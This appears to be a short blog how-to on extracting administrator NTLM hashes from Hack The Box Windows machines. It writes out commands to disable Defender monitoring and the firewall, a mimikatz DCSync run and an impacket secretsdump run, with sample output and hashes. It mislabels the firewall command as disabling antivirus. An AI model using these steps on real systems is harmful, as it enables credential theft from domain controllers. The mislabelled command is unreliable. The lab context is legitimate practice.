Preface: If you want to decrypt a writeup for an active windows box on HTB or from other plattforms using the NTLM hash of the administartor user, you are on the right place. In this How-To post I will show you how you can extract the NTLM hash of the administrator user (probably for any user) on windows machines.
At first we will usemimikatz. In the second example I show you how to use secretdump for it.
Using mimikatz
After getting a shell as administrator
you can follow the steps below to extract the NTLM hash.
First disable the real time protection
if its enabled:
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Anti-Virus
protection:
netsh advfirewall set currentprofile state off
Then run mimikatz with the following arguments:
./mimikatz.exe "lsadump::dcsync /user:administrator"
You will get an output like this:
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff
.
Just copy paste it in the writeup where it is asked for.
Using Secretdump
If you have owned a machine and you have the password of the user administrator, you can get the NTLM hash using secrectdump. Secretdump is a tool from impacket-tools.
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
The hash is divided into two sections, first the LM hash and second one is NTLM.
Here we got the NTLM hash which is d9485863c1b9e07543aa40cbb4ab9dfd
.
Just copy paste it in the writeup where it is asked for.